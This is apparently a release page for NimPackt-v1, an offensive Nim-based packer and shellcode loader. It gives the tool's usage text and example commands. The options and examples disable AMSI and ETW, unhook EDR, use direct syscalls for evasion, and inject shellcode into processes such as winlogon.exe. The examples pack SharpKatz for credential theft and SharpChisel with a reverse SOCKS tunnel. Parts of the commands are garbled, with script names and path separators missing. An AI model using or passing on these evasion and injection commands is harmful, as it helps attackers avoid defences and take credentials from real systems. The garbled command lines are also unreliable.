NimPackt-v1 – Nim-based Assembly Packer And Shellcode Loader For Opsec And Profit

By Cas van Cooten (


usage: [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]
[-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]
[-d] [-v] [-V]

required arguments:
Execution mode of the packer. Supports "execute-assembly" or "shinject"
C# .NET binary executable (.exe) or shellcode (.bin) to wrap

execute-assembly arguments:
Arguments to "bake into" the wrapped binary, or "PASSTHRU" to accept run-
time arguments (default)
-na, --nopatchamsi Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)
-ne, --nodisableetw Do NOT disable Event Tracing for Windows (ETW)

shinject arguments:
-r, --remote Inject shellcode into remote process (default false)
Remote thread targeted for remote process injection
-E, --existing Remote inject into existing process rather than a newly spawned one (default
false, implies -r) (WARNING: VOLATILE)

other arguments:
Filename of the output file (e.g. "LegitBinary"). Specify WITHOUT extension
or path. This property will be stored in the output binary as the original
-nu, --nounhook Do NOT unhook user-mode API hooks in the target process by loading a fresh
-ns, --nosyscalls Do NOT use direct syscalls (Windows generation 7-10) instead of high-level
APIs to evade EDR
-f FILETYPE, --filetype FILETYPE
Filetype to compile ("exe" or "dll", default: "exe")
-s, --sleep Sleep for approx. 30 seconds by calculating primes
-32, --32bit Compile in 32-bit mode (untested)
-S, --showConsole Show a console window with the app's output when running
-d, --debug Enable debug mode (retains .nim source file in output folder)
-v, --verbose Print debug messages of the wrapped binary at runtime
-V, --version show program's version number and exit


# Pack SharpKatz to accept arguments at runtime, patching NTDLL hooks, AMSI, and ETW while printing verbose messages to a visible console at runtime
python3 ./ -e execute-assembly -i bins/SharpKatz-x64.exe -S -v

# Pack Seatbelt as a DLL file with baked-in arguments (note: write to outfile because stdout is not available for DLLs)
python3 ./ -f dll -e execute-assembly -i Seatbelt.exe -a "-group=all -outputfile=c:userspublicdownloadssb.txt"

# Pack SharpChisel with a built-in ChiselChief connection string, do not unhook, patch AMSI, or disable ETW, hide the application window at runtime
python3 -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s R:10073:socks'

# Pack raw shellcode to DLL file that executes in the local thre ad through direct syscalls, unhooking NTDLL as well
# Shellcode generated with 'msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o /tmp/calc.bin'
python3 -i calc.bin -e shinject -f dll

# Pack raw shellcode to execute in a newly spawned Calculator thread in an invisible window
python3 -i calc.bin -e shinject -t "calc.exe"

# Pack raw shellcode to execute in the existing Winlogon process (first PID with name 'winlogon.exe'), do not use direct syscalls or unhook NTDLL
python3 -i calc.bin -e shinject -r -E -t "winlogon.exe" -nu -ns

Binaries are stored in the output subfolder of your installation directory. Generated dll files can be executed as follows (entry point can be changed in the Nim template):

rundll32 exampleShinjectNimPackt.dll,IconSrv
Download NimPackt-v1

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